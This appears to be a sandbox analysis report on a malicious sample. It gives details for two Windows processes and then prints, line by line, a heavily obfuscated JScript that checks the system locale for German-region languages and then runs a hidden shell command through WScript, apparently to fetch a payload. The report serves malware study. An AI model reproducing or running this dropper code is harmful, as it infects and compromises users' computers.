Start time: | 02:43:50 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7403e0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 02:43:50 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function zvvogax() { |
|
1 | rvxnki = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var vgovrra = this[wpknsffj + lfhdgijbu + fobdlapau + hcapk + xvtodzdkh + aexlyz + pnfxxep + dmnjixvs] ( this[aiihbju + weiehitr + nvicydhu + fobdlapau + gkfixmqc + wpknsffj + dmnjixvs][gpslkdq + fobdlapau + xvtodzdkh + lfhdgijbu + dmnjixvs + xvtodzdkh + nbrvb + juprktma + rakupdkhl + xvtodzdkh + nvicydhu + dmnjixvs] ( aiihbju + weiehitr + nvicydhu + fobdlapau + gkfixmqc + wpknsffj + dmnjixvs + wycildmkt + weiehitr + lklobc + xvtodzdkh + lxhzk + lxhzk ) [yrlbtbfbv + xvtodzdkh + ocntvil + yrlbtbfbv + xvtodzdkh + lfhdgijbu + fevly] ( ggmmhdfrr + ueanf + vdoelibqg + hbgnoird + hmlikvlb + gpslkdq + dhetawcz + yrlbtbfbv + yrlbtbfbv + vdoelibqg + phgmbeqan + ugevhu + hmlikvlb + dhetawcz + weiehitr + vdoelibqg + yrlbtbfbv + rwpysv + gpslkdq + hyhojiwto + pnfxxep + dmnjixvs + fobdlapau + hyhojiwto + lxhzk + qmnzohh + tvjhn + lfhdgijbu + pnfxxep + xvtodzdkh + lxhzk + rwpysv + aexlyz + pnfxxep + dmnjixvs + xvtodzdkh + fobdlapau + pnfxxep + lfhdgijbu + dmnjixvs + gkfixmqc + hyhojiwto + pnfxxep + lfhdgijbu + lxhzk + rwpysv + lpogdo + hyhojiwto + nvicydhu + lfhdgijbu + lxhzk + xvtodzdkh ), 16 ); |
|
3 | for ( tqekbyz = 0 ; tqekbyz < rvxnki[lxhzk + xvtodzdkh + pnfxxep + ocntvil + dmnjixvs + lklobc] ; ++ tqekbyz ) | |
4 | { | |
5 | if ( vgovrra == rvxnki[tqekbyz] ) | |
6 | { | |
7 | vgovrra = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( vgovrra !== true ) | |
12 | this[aiihbju + weiehitr + nvicydhu + fobdlapau + gkfixmqc + wpknsffj + dmnjixvs][etqxj + jtjlkso + gkfixmqc + dmnjixvs] ( ); | |
13 | this[aiihbju + weiehitr + nvicydhu + fobdlapau + gkfixmqc + wpknsffj + dmnjixvs][gpslkdq + fobdlapau + xvtodzdkh + lfhdgijbu + dmnjixvs + xvtodzdkh + nbrvb + juprktma + rakupdkhl + xvtodzdkh + nvicydhu + dmnjixvs] ( aiihbju + weiehitr + nvicydhu + fobdlapau + gkfixmqc + wpknsffj + dmnjixvs + wycildmkt + weiehitr + lklobc + xvtodzdkh + lxhzk + lxhzk ) [fobdlapau + jtjlkso + pnfxxep] ( nvicydhu + mkdpo + fevly + qmnzohh + radfm + nvicydhu + qmnzohh + wpknsffj + hyhojiwto + lgqmjwoe + xvtodzdkh + fobdlapau + hcapk + lklobc + xvtodzdkh + lxhzk + lxhzk + wycildmkt + xvtodzdkh + cnahvhlc + xvtodzdkh + qmnzohh + lupyax + gpslkdq + hyhojiwto + mkdpo + mkdpo + lfhdgijbu + pnfxxep + fevly + qmnzohh + yjnanyk + aexlyz + pnfxxep + ecfcq + hyhojiwto + fsbckwub + xvtodzdkh + lupyax + aiihbju + xvtodzdkh + juprktma + yrlbtbfbv + xvtodzdkh + nmkjcwwsp + jtjlkso + xvtodzdkh + hcapk + dmnjixvs + qmnzohh + lupyax + nbrvb + jtjlkso + dmnjixvs + hndvlklmf + gkfixmqc + lxhzk + xvtodzdkh + qmnzohh + dcjqgdkps + dmnjixvs + xvtodzdkh + mkdpo + wpknsffj + dcjqgdkps + rwpysv + gkfixmqc + pnfxxep + ecfcq + hyhojiwto + gkfixmqc + nvicydhu + xvtodzdkh + wycildmkt + wpknsffj + fevly + amkwellax + qmnzohh + lklobc + dmnjixvs + dmnjixvs + wpknsffj + dxbtrbn + radfm + radfm + bxwkv + syjiawcv + djzfedeki + wycildmkt + bxwkv + jqubxm + djzfedeki + wycildmkt + bxwkv + wycildmkt + zsnsik + zboyt + gfoqzue + radfm + gkfixmqc + pnfxxep + ecfcq + hyhojiwto + gkfixmqc + nvicydhu + xvtodzdkh + wycildmkt + wpknsffj + lklobc + wpknsffj + yjnanyk + jhyqvh + jhyqvh + hcapk + dmnjixvs + lfhdgijbu + fobdlapau + dmnjixvs + qmnzohh + dcjqgdkps + dmnjixvs + xvtodzdkh + mkdpo + wpknsffj + dcjqgdkps + rwpysv + gkfixmqc + pnfxxep + ecfcq + hyhojiwto + gkfixmqc + nvicydhu + xvtodzdkh + wycildmkt + wpknsffj + fevly + amkwellax + jhyqvh + jhyqvh + nvicydhu + mkdpo + fevly + qmnzohh + radfm + nvicydhu + qmnzohh + pnfxxep + xvtodzdkh + dmnjixvs + qmnzohh + jtjlkso + hcapk + xvtodzdkh + qmnzohh + rwpysv + rwpysv + bxwkv + syjiawcv + djzfedeki + wycildmkt + bxwkv + jqubxm + djzfedeki + wycildmkt + bxwkv + wycildmkt + zsnsik + zboyt + gfoqzue + sklsvnn + qrgigyjz + qrgigyjz + qrgigyjz + qrgigyjz + rwpysv + fevly + lfhdgijbu + ecfcq + lgqmjwoe + lgqmjwoe + lgqmjwoe + fobdlapau + hyhojiwto + hyhojiwto + dmnjixvs + rwpysv + jhyqvh + jhyqvh + nvicydhu + mkdpo + fevly + qmnzohh + radfm + nvicydhu + qmnzohh + fobdlapau + xvtodzdkh + ocntvil + hcapk + ecfcq + fobdlapau + djzfedeki + zsnsik + qmnzohh + radfm + hcapk + qmnzohh + rwpysv + rwpysv + bxwkv + syjiawcv + djzfedeki + wycildmkt + bxwkv + jqubxm + djzfedeki + wycildmkt + bxwkv + wycildmkt + zsnsik + zboyt + gfoqzue + sklsvnn + qrgigyjz + qrgigyjz + qrgigyjz + qrgigyjz + rwpysv + fevly + lfhdgijbu + ecfcq + lgqmjwoe + lgqmjwoe + lgqmjwoe + fobdlapau + hyhojiwto + hyhojiwto + dmnjixvs + rwpysv + bxwkv + tofdubkqk + unvezpm + djzfedeki + djzfedeki + djzfedeki + qrgigyjz + unvezpm + zsnsik + bxwkv + tofdubkqk + tofdubkqk + syjiawcv + wycildmkt + fevly + lxhzk + lxhzk, 0, false ); |
|
14 | } | |
15 | wpknsffj = "B"; | |
16 | wpknsffj = "w"; | |
17 | wpknsffj = "p"; | |
18 | hbgnoird = "l"; | |
19 | hbgnoird = "L"; | |
20 | hbgnoird = "w"; | |
21 | hbgnoird = "a"; | |
22 | hbgnoird = "Y"; | |
23 | hbgnoird = "z"; | |
24 | hbgnoird = "X"; | |
25 | hbgnoird = "W"; | |
26 | hbgnoird = "Z"; | |
27 | hbgnoird = "p"; | |
28 | hbgnoird = "f"; | |
29 | hbgnoird = "m"; | |
30 | hbgnoird = "S"; | |
31 | hbgnoird = "C"; | |
32 | hbgnoird = "G"; | |
33 | hbgnoird = "l"; | |
34 | hbgnoird = "h"; | |
35 | hbgnoird = "w"; | |
36 | hbgnoird = "C"; | |
37 | hbgnoird = "f"; | |
38 | hbgnoird = "K"; | |
39 | hbgnoird = "d"; | |
40 | hbgnoird = "G"; | |
41 | hbgnoird = "H"; | |
42 | hbgnoird = "B"; | |
43 | hbgnoird = "R"; | |
44 | hbgnoird = "E"; | |
45 | hbgnoird = "s"; | |
46 | hbgnoird = "O"; | |
47 | hbgnoird = "Y"; | |
48 | nbrvb = "m"; | |
49 | nbrvb = "m"; | |
50 | nbrvb = "O"; | |
51 | dmnjixvs = "X"; | |
52 | dmnjixvs = "l"; | |
53 | dmnjixvs = "w"; | |
54 | dmnjixvs = "w"; | |
55 | dmnjixvs = "N"; | |
56 | dmnjixvs = "L"; | |
57 | dmnjixvs = "C"; | |
58 | dmnjixvs = "h"; | |
59 | dmnjixvs = "g"; | |
60 | dmnjixvs = "e"; | |
61 | dmnjixvs = "f"; | |
62 | dmnjixvs = "Z"; | |
63 | dmnjixvs = "d"; | |
64 | dmnjixvs = "L"; | |
65 | dmnjixvs = "q"; | |
66 | dmnjixvs = "t"; | |
67 | dmnjixvs = "r"; | |
68 | dmnjixvs = "A"; | |
69 | dmnjixvs = "H"; | |
70 | dmnjixvs = "R"; | |
71 | dmnjixvs = "J"; | |
72 | dmnjixvs = "z"; | |
73 | dmnjixvs = "Q"; | |
74 | dmnjixvs = "t"; | |
75 | yrlbtbfbv = "M"; | |
76 | yrlbtbfbv = "t"; | |
77 | yrlbtbfbv = "k"; | |
78 | yrlbtbfbv = "c"; | |
79 | yrlbtbfbv = "k"; | |
80 | yrlbtbfbv = "F"; | |
81 | yrlbtbfbv = "B"; | |
82 | yrlbtbfbv = "t"; | |
83 | yrlbtbfbv = "j"; | |
84 | yrlbtbfbv = "u"; | |
85 | yrlbtbfbv = "B"; | |
86 | yrlbtbfbv = "g"; | |
87 | yrlbtbfbv = "v"; | |
88 | yrlbtbfbv = "x"; | |
89 | yrlbtbfbv = "R"; | |
90 | ggmmhdfrr = "g"; | |
91 | ggmmhdfrr = "l"; | |
92 | ggmmhdfrr = "a"; | |
93 | ggmmhdfrr = "E"; | |
94 | ggmmhdfrr = "q"; | |
95 | ggmmhdfrr = "S"; | |
96 | ggmmhdfrr = "Y"; | |
97 | ggmmhdfrr = "U"; | |
98 | ggmmhdfrr = "Q"; | |
99 | ggmmhdfrr = "B"; | |
100 | ggmmhdfrr = "A"; | |
101 | ggmmhdfrr = "j"; | |
102 | ggmmhdfrr = "y"; | |
103 | ggmmhdfrr = "K"; | |
104 | ggmmhdfrr = "c"; | |
105 | ggmmhdfrr = "z"; | |
106 | ggmmhdfrr = "V"; | |
107 | ggmmhdfrr = "f"; | |
108 | ggmmhdfrr = "H"; | |
109 | syjiawcv = "J"; | |
110 | syjiawcv = "C"; | |
111 | syjiawcv = "f"; | |
112 | syjiawcv = "L"; | |
113 | syjiawcv = "D"; | |
114 | syjiawcv = "M"; | |
115 | syjiawcv = "F"; | |
116 | syjiawcv = "u"; | |
117 | syjiawcv = "g"; | |
118 | syjiawcv = "t"; | |
119 | syjiawcv = "v"; | |
120 | syjiawcv = "u"; | |
121 | syjiawcv = "y"; | |
122 | syjiawcv = "A"; | |
123 | syjiawcv = "C"; | |
124 | syjiawcv = "O"; | |
125 | syjiawcv = "T"; | |
126 | syjiawcv = "A"; | |
127 | syjiawcv = "I"; | |
128 | syjiawcv = "e"; | |
129 | syjiawcv = "F"; | |
130 | syjiawcv = "u"; | |
131 | syjiawcv = "C"; | |
132 | syjiawcv = "w"; | |
133 | syjiawcv = "t"; | |
134 | syjiawcv = "R"; | |
135 | syjiawcv = "W"; | |
136 | syjiawcv = "m"; | |
137 | syjiawcv = "b"; | |
138 | syjiawcv = "F"; | |
139 | syjiawcv = "9"; | |
140 | ueanf = "R"; | |
141 | ueanf = "K"; | |
142 | ueanf = "j"; | |
143 | ueanf = "N"; | |
144 | ueanf = "y"; | |
145 | ueanf = "q"; | |
146 | ueanf = "V"; | |
147 | ueanf = "p"; | |
148 | ueanf = "M"; | |
149 | ueanf = "Z"; | |
150 | ueanf = "X"; | |
151 | ueanf = "I"; | |
152 | ueanf = "V"; | |
153 | ueanf = "j"; | |
154 | ueanf = "r"; | |
155 | ueanf = "m"; | |
156 | ueanf = "y"; | |
157 | ueanf = "z"; | |
158 | ueanf = "N"; | |
159 | ueanf = "K"; | |
160 | yjnanyk = "t"; | |
161 | yjnanyk = "X"; | |
162 | yjnanyk = "j"; | |
163 | yjnanyk = "S"; | |
164 | yjnanyk = "C"; | |
165 | yjnanyk = "M"; | |
166 | yjnanyk = "T"; | |
167 | yjnanyk = "f"; | |
168 | yjnanyk = "f"; | |
169 | yjnanyk = "w"; | |
170 | yjnanyk = "Y"; | |
171 | yjnanyk = "n"; | |
172 | yjnanyk = "y"; | |
173 | yjnanyk = "m"; | |
174 | yjnanyk = "z"; | |
175 | yjnanyk = "G"; | |
176 | yjnanyk = "m"; | |
177 | yjnanyk = "e"; | |
178 | yjnanyk = "\""; | |
179 | gpslkdq = "u"; | |
180 | gpslkdq = "v"; | |
181 | gpslkdq = "v"; | |
182 | gpslkdq = "n"; | |
183 | gpslkdq = "M"; | |
184 | gpslkdq = "m"; | |
185 | gpslkdq = "g"; | |
186 | gpslkdq = "L"; | |
187 | gpslkdq = "t"; | |
188 | gpslkdq = "b"; | |
189 | gpslkdq = "U"; | |
190 | gpslkdq = "H"; | |
191 | gpslkdq = "V"; | |
192 | gpslkdq = "E"; | |
193 | gpslkdq = "V"; | |
194 | gpslkdq = "J"; | |
195 | gpslkdq = "N"; | |
196 | gpslkdq = "c"; | |
197 | gpslkdq = "v"; | |
198 | gpslkdq = "i"; | |
199 | gpslkdq = "s"; | |
200 | gpslkdq = "W"; | |
201 | gpslkdq = "f"; | |
202 | gpslkdq = "L"; | |
203 | gpslkdq = "C"; | |
204 | weiehitr = "R"; | |
205 | weiehitr = "b"; | |
206 | weiehitr = "X"; | |
207 | weiehitr = "E"; | |
208 | weiehitr = "P"; | |
209 | weiehitr = "u"; | |
210 | weiehitr = "n"; | |
211 | weiehitr = "S"; | |
212 | jtjlkso = "R"; | |
213 | jtjlkso = "N"; | |
214 | jtjlkso = "E"; | |
215 | jtjlkso = "u"; | |
216 | pnfxxep = "i"; | |
217 | pnfxxep = "N"; | |
218 | pnfxxep = "u"; | |
219 | pnfxxep = "W"; | |
220 | pnfxxep = "u"; | |
221 | pnfxxep = "h"; | |
222 | pnfxxep = "A"; | |
223 | pnfxxep = "H"; | |
224 | pnfxxep = "g"; | |
225 | pnfxxep = "M"; | |
226 | pnfxxep = "G"; | |
227 | pnfxxep = "Z"; | |
228 | pnfxxep = "K"; | |
229 | pnfxxep = "T"; | |
230 | pnfxxep = "V"; | |
231 | pnfxxep = "r"; | |
232 | pnfxxep = "L"; | |
233 | pnfxxep = "J"; | |
234 | pnfxxep = "R"; | |
235 | pnfxxep = "V"; | |
236 | pnfxxep = "d"; | |
237 | pnfxxep = "N"; | |
238 | pnfxxep = "r"; | |
239 | pnfxxep = "S"; | |
240 | pnfxxep = "L"; | |
241 | pnfxxep = "r"; | |
242 | pnfxxep = "J"; | |
243 | pnfxxep = "L"; | |
244 | pnfxxep = "m"; | |
245 | pnfxxep = "m"; | |
246 | pnfxxep = "o"; | |
247 | pnfxxep = "i"; | |
248 | pnfxxep = "B"; | |
249 | pnfxxep = "a"; | |
250 | pnfxxep = "V"; | |
251 | pnfxxep = "e"; | |
252 | pnfxxep = "n"; | |
253 | jhyqvh = "Z"; | |
254 | jhyqvh = "r"; | |
255 | jhyqvh = "W"; | |
256 | jhyqvh = "s"; | |
257 | jhyqvh = "v"; | |
258 | jhyqvh = "g"; | |
259 | jhyqvh = "M"; | |
260 | jhyqvh = "a"; | |
261 | jhyqvh = "Q"; | |
262 | jhyqvh = "A"; | |
263 | jhyqvh = "O"; | |
264 | jhyqvh = "h"; | |
265 | jhyqvh = "W"; | |
266 | jhyqvh = "Y"; | |
267 | jhyqvh = "Z"; | |
268 | jhyqvh = "G"; | |
269 | jhyqvh = "I"; | |
270 | jhyqvh = "v"; | |
271 | jhyqvh = "&"; | |
272 | radfm = "z"; | |
273 | radfm = "T"; | |
274 | radfm = "u"; | |
275 | radfm = "K"; | |
276 | radfm = "R"; | |
277 | radfm = "T"; | |
278 | radfm = "x"; | |
279 | radfm = "j"; | |
280 | radfm = "c"; | |
281 | radfm = "w"; | |
282 | radfm = "z"; | |
283 | radfm = "c"; | |
284 | radfm = "d"; | |
285 | radfm = "u"; | |
286 | radfm = "f"; | |
287 | radfm = "o"; | |
288 | radfm = "l"; | |
289 | radfm = "j"; | |
290 | radfm = "W"; | |
291 | radfm = "F"; | |
292 | radfm = "l"; | |
293 | radfm = "e"; | |
294 | radfm = "A"; | |
295 | radfm = "W"; | |
296 | radfm = "/"; | |
297 | nvicydhu = "g"; | |
298 | nvicydhu = "P"; | |
299 | nvicydhu = "h"; | |
300 | nvicydhu = "w"; | |
301 | nvicydhu = "p"; | |
302 | nvicydhu = "V"; | |
303 | nvicydhu = "z"; | |
304 | nvicydhu = "o"; | |
305 | nvicydhu = "U"; | |
306 | nvicydhu = "l"; | |
307 | nvicydhu = "h"; | |
308 | nvicydhu = "c"; | |
309 | xvtodzdkh = "s"; | |
310 | xvtodzdkh = "A"; | |
311 | xvtodzdkh = "j"; | |
312 | xvtodzdkh = "N"; | |
313 | xvtodzdkh = "b"; | |
314 | xvtodzdkh = "N"; | |
315 | xvtodzdkh = "l"; | |
316 | xvtodzdkh = "J"; | |
317 | xvtodzdkh = "e"; | |
318 | xvtodzdkh = "t"; | |
319 | xvtodzdkh = "W"; | |
320 | xvtodzdkh = "V"; | |
321 | xvtodzdkh = "l"; | |
322 | xvtodzdkh = "r"; | |
323 | xvtodzdkh = "s"; | |
324 | xvtodzdkh = "x"; | |
325 | xvtodzdkh = "j"; | |
326 | xvtodzdkh = "C"; | |
327 | xvtodzdkh = "y"; | |
328 | xvtodzdkh = "K"; | |
329 | xvtodzdkh = "N"; | |
330 | xvtodzdkh = "i"; | |
331 | xvtodzdkh = "v"; | |
332 | xvtodzdkh = "k"; | |
333 | xvtodzdkh = "l"; | |
334 | xvtodzdkh = "s"; | |
335 | xvtodzdkh = "g"; | |
336 | xvtodzdkh = "e"; | |
337 | xvtodzdkh = "c"; | |
338 | xvtodzdkh = "k"; | |
339 | xvtodzdkh = "k"; | |
340 | xvtodzdkh = "N"; | |
341 | xvtodzdkh = "P"; | |
342 | xvtodzdkh = "o"; | |
343 | xvtodzdkh = "d"; | |
344 | xvtodzdkh = "R"; | |
345 | xvtodzdkh = "b"; | |
346 | xvtodzdkh = "e"; | |
347 | bxwkv = "s"; | |
348 | bxwkv = "R"; | |
349 | bxwkv = "O"; | |
350 | bxwkv = "C"; | |
351 | bxwkv = "U"; | |
352 | bxwkv = "H"; | |
353 | bxwkv = "F"; | |
354 | bxwkv = "l"; | |
355 | bxwkv = "L"; | |
356 | bxwkv = "e"; | |
357 | bxwkv = "q"; | |
358 | bxwkv = "S"; | |
359 | bxwkv = "y"; | |
360 | bxwkv = "y"; | |
361 | bxwkv = "L"; | |
362 | bxwkv = "h"; | |
363 | bxwkv = "D"; | |
364 | bxwkv = "k"; | |
365 | bxwkv = "1"; | |
366 | zsnsik = "d"; | |
367 | zsnsik = "O"; | |
368 | zsnsik = "g"; | |
369 | zsnsik = "w"; | |
370 | zsnsik = "Q"; | |
371 | zsnsik = "U"; | |
372 | zsnsik = "c"; | |
373 | zsnsik = "o"; | |
374 | zsnsik = "j"; | |
375 | zsnsik = "B"; | |
376 | zsnsik = "d"; | |
377 | zsnsik = "r"; | |
378 | zsnsik = "D"; | |
379 | zsnsik = "s"; | |
380 | zsnsik = "f"; | |
381 | zsnsik = "2"; | |
382 | juprktma = "Q"; | |
383 | juprktma = "W"; | |
384 | juprktma = "B"; | |
385 | juprktma = "H"; | |
386 | juprktma = "U"; | |
387 | juprktma = "Z"; | |
388 | juprktma = "d"; | |
389 | juprktma = "N"; | |
390 | juprktma = "r"; | |
391 | juprktma = "j"; | |
392 | juprktma = "N"; | |
393 | juprktma = "F"; | |
394 | juprktma = "x"; | |
395 | juprktma = "D"; | |
396 | juprktma = "Y"; | |
397 | juprktma = "P"; | |
398 | juprktma = "J"; | |
399 | juprktma = "s"; | |
400 | juprktma = "K"; | |
401 | juprktma = "S"; | |
402 | juprktma = "p"; | |
403 | juprktma = "b"; | |
404 | juprktma = "l"; | |
405 | juprktma = "K"; | |
406 | juprktma = "b"; | |
407 | gkfixmqc = "H"; | |
408 | gkfixmqc = "m"; | |
409 | gkfixmqc = "N"; | |
410 | gkfixmqc = "s"; | |
411 | gkfixmqc = "I"; | |
412 | gkfixmqc = "D"; | |
413 | gkfixmqc = "Z"; | |
414 | gkfixmqc = "a"; | |
415 | gkfixmqc = "M"; | |
416 | gkfixmqc = "c"; | |
417 | gkfixmqc = "l"; | |
418 | gkfixmqc = "c"; | |
419 | gkfixmqc = "P"; | |
420 | gkfixmqc = "M"; | |
421 | gkfixmqc = "V"; | |
422 | gkfixmqc = "k"; | |
423 | gkfixmqc = "y"; | |
424 | gkfixmqc = "z"; | |
425 | gkfixmqc = "S"; | |
426 | gkfixmqc = "I"; | |
427 | gkfixmqc = "e"; | |
428 | gkfixmqc = "i"; | |
429 | fevly = "o"; | |
430 | fevly = "X"; | |
431 | fevly = "l"; | |
432 | fevly = "T"; | |
433 | fevly = "v"; | |
434 | fevly = "Q"; | |
435 | fevly = "V"; | |
436 | fevly = "O"; | |
437 | fevly = "g"; | |
438 | fevly = "k"; | |
439 | fevly = "g"; | |
440 | fevly = "c"; | |
441 | fevly = "V"; | |
442 | fevly = "k"; | |
443 | fevly = "p"; | |
444 | fevly = "a"; | |
445 | fevly = "Q"; | |
446 | fevly = "a"; | |
447 | fevly = "r"; | |
448 | fevly = "N"; | |
449 | fevly = "t"; | |
450 | fevly = "j"; | |
451 | fevly = "H"; | |
452 | fevly = "c"; | |
453 | fevly = "f"; | |
454 | fevly = "v"; | |
455 | fevly = "K"; | |
456 | fevly = "s"; | |
457 | fevly = "V"; | |
458 | fevly = "F"; | |
459 | fevly = "C"; | |
460 | fevly = "J"; | |
461 | fevly = "Q"; | |
462 | fevly = "w"; | |
463 | fevly = "Z"; | |
464 | fevly = "h"; | |
465 | fevly = "G"; | |
466 | fevly = "d"; | |
467 | tofdubkqk = "v"; | |
468 | tofdubkqk = "i"; | |
469 | tofdubkqk = "W"; | |
470 | tofdubkqk = "D"; | |
471 | tofdubkqk = "M"; | |
472 | tofdubkqk = "e"; | |
473 | tofdubkqk = "I"; | |
474 | tofdubkqk = "j"; | |
475 | tofdubkqk = "r"; | |
476 | tofdubkqk = "j"; | |
477 | tofdubkqk = "A"; | |
478 | tofdubkqk = "I"; | |
479 | tofdubkqk = "b"; | |
480 | tofdubkqk = "W"; | |
481 | tofdubkqk = "a"; | |
482 | tofdubkqk = "W"; | |
483 | tofdubkqk = "G"; | |
484 | tofdubkqk = "y"; | |
485 | tofdubkqk = "u"; | |
486 | tofdubkqk = "Y"; | |
487 | tofdubkqk = "U"; | |
488 | tofdubkqk = "w"; | |
489 | tofdubkqk = "O"; | |
490 | tofdubkqk = "K"; | |
491 | tofdubkqk = "y"; | |
492 | tofdubkqk = "D"; | |
493 | tofdubkqk = "S"; | |
494 | tofdubkqk = "u"; | |
495 | tofdubkqk = "J"; | |
496 | tofdubkqk = "D"; | |
497 | tofdubkqk = "6"; | |
498 | lxhzk = "K"; | |
499 | lxhzk = "I"; | |
500 | lxhzk = "o"; | |
501 | lxhzk = "I"; | |
502 | lxhzk = "Y"; | |
503 | lxhzk = "g"; | |
504 | lxhzk = "Y"; | |
505 | lxhzk = "L"; | |
506 | lxhzk = "i"; | |
507 | lxhzk = "s"; | |
508 | lxhzk = "X"; | |
509 | lxhzk = "l"; | |
510 | lgqmjwoe = "f"; | |
511 | lgqmjwoe = "y"; | |
512 | lgqmjwoe = "o"; | |
513 | lgqmjwoe = "K"; | |
514 | lgqmjwoe = "j"; | |
515 | lgqmjwoe = "V"; | |
516 | lgqmjwoe = "a"; | |
517 | lgqmjwoe = "e"; | |
518 | lgqmjwoe = "g"; | |
519 | lgqmjwoe = "C"; | |
520 | lgqmjwoe = "t"; | |
521 | lgqmjwoe = "r"; | |
522 | lgqmjwoe = "E"; | |
523 | lgqmjwoe = "K"; | |
524 | lgqmjwoe = "E"; | |
525 | lgqmjwoe = "w"; | |
526 | lgqmjwoe = "p"; | |
527 | lgqmjwoe = "U"; | |
528 | lgqmjwoe = "a"; | |
529 | lgqmjwoe = "V"; | |
530 | lgqmjwoe = "S"; | |
531 | lgqmjwoe = "d"; | |
532 | lgqmjwoe = "g"; | |
533 | lgqmjwoe = "N"; | |
534 | lgqmjwoe = "x"; | |
535 | lgqmjwoe = "x"; | |
536 | lgqmjwoe = "A"; | |
537 | lgqmjwoe = "u"; | |
538 | lgqmjwoe = "x"; | |
539 | lgqmjwoe = "u"; | |
540 | lgqmjwoe = "f"; | |
541 | lgqmjwoe = "T"; | |
542 | lgqmjwoe = "r"; | |
543 | lgqmjwoe = "u"; | |
544 | lgqmjwoe = "V"; | |
545 | lgqmjwoe = "M"; | |
546 | lgqmjwoe = "y"; | |
547 | lgqmjwoe = "w"; | |
548 | hndvlklmf = "Z"; | |
549 | hndvlklmf = "g"; | |
550 | hndvlklmf = "D"; | |
551 | hndvlklmf = "v"; | |
552 | hndvlklmf = "B"; | |
553 | hndvlklmf = "q"; | |
554 | hndvlklmf = "q"; | |
555 | hndvlklmf = "z"; | |
556 | hndvlklmf = "f"; | |
557 | hndvlklmf = "Y"; | |
558 | hndvlklmf = "t"; | |
559 | hndvlklmf = "t"; | |
560 | hndvlklmf = "N"; | |
561 | hndvlklmf = "P"; | |
562 | hndvlklmf = "J"; | |
563 | hndvlklmf = "X"; | |
564 | hndvlklmf = "W"; | |
565 | hndvlklmf = "e"; | |
566 | hndvlklmf = "u"; | |
567 | hndvlklmf = "S"; | |
568 | hndvlklmf = "s"; | |
569 | hndvlklmf = "V"; | |
570 | hndvlklmf = "v"; | |
571 | hndvlklmf = "E"; | |
572 | hndvlklmf = "J"; | |
573 | hndvlklmf = "y"; | |
574 | hndvlklmf = "K"; | |
575 | hndvlklmf = "y"; | |
576 | hndvlklmf = "x"; | |
577 | hndvlklmf = "f"; | |
578 | hndvlklmf = "G"; | |
579 | hndvlklmf = "L"; | |
580 | hndvlklmf = "H"; | |
581 | hndvlklmf = "P"; | |
582 | hndvlklmf = "E"; | |
583 | hndvlklmf = "C"; | |
584 | hndvlklmf = "F"; | |
585 | zboyt = "w"; | |
586 | zboyt = "a"; | |
587 | zboyt = "Q"; | |
588 | zboyt = "d"; | |
589 | zboyt = "f"; | |
590 | zboyt = "f"; | |
591 | zboyt = "t"; | |
592 | zboyt = "S"; | |
593 | zboyt = "o"; | |
594 | zboyt = "Y"; | |
595 | zboyt = "Y"; | |
596 | zboyt = "y"; | |
597 | zboyt = "K"; | |
598 | zboyt = "y"; | |
599 | zboyt = "d"; | |
600 | zboyt = "m"; | |
601 | zboyt = "H"; | |
602 | zboyt = "c"; | |
603 | zboyt = "B"; | |
604 | zboyt = "k"; | |
605 | zboyt = "U"; | |
606 | zboyt = "S"; | |
607 | zboyt = "w"; | |
608 | zboyt = "N"; | |
609 | zboyt = "J"; | |
610 | zboyt = "D"; | |
611 | zboyt = "z"; | |
612 | zboyt = "I"; | |
613 | zboyt = "0"; | |
614 | aiihbju = "c"; | |
615 | aiihbju = "N"; | |
616 | aiihbju = "w"; | |
617 | aiihbju = "P"; | |
618 | aiihbju = "o"; | |
619 | aiihbju = "y"; | |
620 | aiihbju = "r"; | |
621 | aiihbju = "N"; | |
622 | aiihbju = "k"; | |
623 | aiihbju = "D"; | |
624 | aiihbju = "d"; | |
625 | aiihbju = "U"; | |
626 | aiihbju = "C"; | |
627 | aiihbju = "n"; | |
628 | aiihbju = "W"; | |
629 | aiihbju = "Y"; | |
630 | aiihbju = "t"; | |
631 | aiihbju = "t"; | |
632 | aiihbju = "L"; | |
633 | aiihbju = "B"; | |
634 | aiihbju = "W"; | |
635 | fobdlapau = "W"; | |
636 | fobdlapau = "a"; | |
637 | fobdlapau = "f"; | |
638 | fobdlapau = "a"; | |
639 | fobdlapau = "b"; | |
640 | fobdlapau = "c"; | |
641 | fobdlapau = "i"; | |
642 | fobdlapau = "Y"; | |
643 | fobdlapau = "P"; | |
644 | fobdlapau = "m"; | |
645 | fobdlapau = "j"; | |
646 | fobdlapau = "p"; | |
647 | fobdlapau = "A"; | |
648 | fobdlapau = "o"; | |
649 | fobdlapau = "i"; | |
650 | fobdlapau = "S"; | |
651 | fobdlapau = "g"; | |
652 | fobdlapau = "g"; | |
653 | fobdlapau = "W"; | |
654 | fobdlapau = "h"; | |
655 | fobdlapau = "P"; | |
656 | fobdlapau = "j"; | |
657 | fobdlapau = "z"; | |
658 | fobdlapau = "T"; | |
659 | fobdlapau = "r"; | |
660 | dhetawcz = "f"; | |
661 | dhetawcz = "w"; | |
662 | dhetawcz = "B"; | |
663 | dhetawcz = "Z"; | |
664 | dhetawcz = "h"; | |
665 | dhetawcz = "n"; | |
666 | dhetawcz = "G"; | |
667 | dhetawcz = "O"; | |
668 | dhetawcz = "C"; | |
669 | dhetawcz = "J"; | |
670 | dhetawcz = "W"; | |
671 | dhetawcz = "I"; | |
672 | dhetawcz = "Y"; | |
673 | dhetawcz = "n"; | |
674 | dhetawcz = "x"; | |
675 | dhetawcz = "m"; | |
676 | dhetawcz = "U"; | |
677 | dhetawcz = "w"; | |
678 | dhetawcz = "T"; | |
679 | dhetawcz = "K"; | |
680 | dhetawcz = "U"; | |
681 | lfhdgijbu = "K"; | |
682 | lfhdgijbu = "a"; | |
